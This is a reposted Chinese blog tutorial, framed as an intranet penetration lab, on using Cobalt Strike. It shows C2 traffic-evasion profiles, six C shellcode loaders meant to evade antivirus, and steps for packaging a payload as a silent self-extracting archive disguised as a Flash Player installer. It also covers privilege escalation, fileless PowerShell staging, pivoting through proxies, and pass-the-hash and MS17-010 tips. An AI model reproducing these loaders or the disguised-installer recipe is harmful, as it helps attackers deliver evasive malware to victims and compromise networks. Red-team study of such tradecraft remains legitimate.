内网渗透实验:基于Cobaltstrike的一系列实验

栏目: IT技术 · 发布时间: 4年前

内容简介:去年年初发了一篇文章Web渗透实验:基于Weblogic的一系列漏洞,通常来讲,拿到webshell我们一般可以这么利用(百度搜索:内网渗透之reGeorg+Proxifier)。

前言

去年年初发了一篇文章Web渗透实验:基于Weblogic的一系列漏洞,

今年把这篇文章接力写一下。

通常来讲,拿到webshell我们一般可以这么利用(百度搜索:内网渗透之reGeorg+Proxifier)。

这篇文章用cs开启代理,用proxifier连接后潜入内网。

这里引用一张实验室小伙伴总结的内网常见 工具 图。

内网渗透实验:基于Cobaltstrike的一系列实验 有兴趣同学可以看看该文章 《内网渗透之端口转发》

第一步:cobaltstrike服务端客户端

一、服务端

1.流量检测绕过

定义C2的通信格式,修改CS默认的流量特征,以对抗流量分析

开源Profiles: https://github.com/rsmudge/Malleable-C2-Profiles

2.测试运行Profiles是否正常

./c2lint

没有出现红色的提示则为正常

内网渗透实验:基于Cobaltstrike的一系列实验 3.后台运行

一般都是用服务器,所以关闭终端就是断开与服务器的连接,且当前运行的进程会结束,所以我们需要后台运行

但是当我使用nohup启动时,还是发现会间歇的终断我的服务端。

这里使用screen工具

安装:

CentOS/RedHat/Fedora

yum -y install screen

Ubuntu/Debian

apt-get -y install screen

常用命令:

创建会话(-m 强制):

screen -dmS name

查看所有会话:

screen -ls

进入会话:

screen -r name

远程deatch某个会话(暂时离开某session)

screen -d (screen -d yourname )

退出当前的会话保持程序运行

ctrl+a+d

服务端启动命令:

sodu ./teamserver 服务器IP 连接密码 Profiles文件(Profiles是为了绕过ids,可以不写)

内网渗透实验:基于Cobaltstrike的一系列实验

二、客户端

1.打开cs

 java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC  -jar cobaltstrike.jar

这里用的是3.14patch中文版(文末见下载地址)

2.AggressorScripts(侵略者脚本)

脚本介绍:(不增加篇幅了,引用2篇文章)

使用Aggressor脚本雕饰Cobalt Strike

Cobalt Strike系列教程第六章:安装扩展

笔者常用:

 AVQuery.nsa (通过检查注册表键值来判断杀毒软件)
 ProcessColor.cna(显示带有颜色的进程列表)
 ProcessMonitor.cna(指定时间段内对于程序运行情况的监控)
 elevate.cna(增加五种提权方式)

3.shellcode免杀及捆绑exe

(1)生成shellcode

(2)c加载(网络收集的加载方法)

#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
void main()
{
 ((void(*)(void))&shellcode)();
}
#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
void main()
{
     PVOID p = NULL;
               if((p = VirtualAlloc(NULL,sizeof(shellcode),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE)) == NULL)
                               MessageBox(NULL,"VirtuallAlloc Failed!!!","Prompt",MB_OK);
               if(!(memcpy(p,shellcode,sizeof(shellcode))))
                               MessageBox(NULL,"WriteMemory Failed!!!","Prompt",MB_OK);
               CODE code = (CODE)p;  
               code();  
}
#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
void main()
{
               __asm
               {  
                               lea eax,shellcode;  
                               jmp eax;  
               }  
}
#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
void main()
{
   __asm  
               {  
                               mov eax,offset shellcode;  
                               jmp eax;
               }  
}
#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
void main()
{
                __asm
               {
                               mov eax,offset shellcode;
                               _emit 0xFF;
                               _emit 0xE0;
               } 
}
#include <windows.h>
#include <stdio.h>
unsigned char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
unsigned char noshellcode[] = "";
void main()
{
  ((void(*)(void))&noshellcode)();
}

用python go等语言打包成exe免杀效果更佳。

(3)自解压

1、coblatstrike 生成的shellcode经过处理生成的exe,然后准备一个exe的程序。

2、鼠标右键,添加到压缩文件。点击创建自解压格式压缩文件。rar就会变成exe后缀的文件。

内网渗透实验:基于Cobaltstrike的一系列实验

3、高级自解压选项,

常规->解压路径

 C:\windows\temp 

绝对路径

4、设置

设置程序

提取后运行

 C:\windows\temp\shellcode.exe
 C:\windows\temp\flashplayer_install_cn.exe

5、模式

静默模式->全部隐藏

6、更新

更新方式

解压并更新文件,覆盖所有文件

7、点击确定按钮,在点击确定按钮生成”新建文件夹.exe”

第二步:shell提权利用

不是管理员权限可以在webshell管理器提权,cs也支持提权,用到我们的AggressorScripts,提权cna脚本。

内网渗透实验:基于Cobaltstrike的一系列实验

(提权前)

内网渗透实验:基于Cobaltstrike的一系列实验

(提权后)

第三步:横向内网

这里提一下无文件渗透:

在windows下,一般通过远程加载powershell脚本来进行。

内网渗透实验:基于Cobaltstrike的一系列实验

cs直接生成这条命令。

内网渗透实验:基于Cobaltstrike的一系列实验 复制这条命令去执行目标上线且没有留下任何文件(这就叫无文件渗透)

这里简单介绍,有兴趣的去深入了解一下powershell。

1.开启代理

内网渗透实验:基于Cobaltstrike的一系列实验

2.下载proxychains4并配置

修改配置vim zhukaiang7 /usr/local/etc/proxychains.conf

测试是否成功:

proxychains4 curl ip.cn

内网渗透实验:基于Cobaltstrike的一系列实验

(代理失败) 内网渗透实验:基于Cobaltstrike的一系列实验 (代理成功)

3.下载proxifier及配置

内网渗透实验:基于Cobaltstrike的一系列实验 附录:

内网渗透主要还是信息收集,很多时候内网密码同样的  直接通杀。

 1.抓取现有肉鸡服务器的密码,走一波内网通用口令及弱口令,可以对B段或C段进行扫描,ms17010漏洞的扫描利用,中间件漏洞,如weblogic、jboss、等漏洞。
 2.寻找到域成员主机,定位域控服务器IP,如果有域管理员或域成员hash,可以pass the hash尝试登录其他主机,直到得到域管理员账号hash。

附上视频学习:

*本文原创作者:zhukaiang7,本文属于FreeBuf原创奖励计划,未经许可禁止转载


以上所述就是小编给大家介绍的《内网渗透实验:基于Cobaltstrike的一系列实验》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

数据结构与算法分析

数据结构与算法分析

韦斯(Mark Allen Weiss) / 机械工业出版社 / 2010-8 / 45.00元

《数据结构与算法分析:C语言描述》曾被评为20世纪顶尖的30部计算机著作之一,作者在数据结构和算法分析方面卓有建树,他的数据结构和算法分析的著作尤其畅销,并受到广泛好评,已被世界500余所大学选作教材。 在《数据结构与算法分析:C语言描述》中,作者精炼并强化了他对算法和数据结构方面创新的处理方法。通过C程序的实现,着重阐述了抽象数据类型的概念,并对算法的效率、性能和运行时间进行了分析。 ......一起来看看 《数据结构与算法分析》 这本书的介绍吧!

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

XML 在线格式化
XML 在线格式化

在线 XML 格式化压缩工具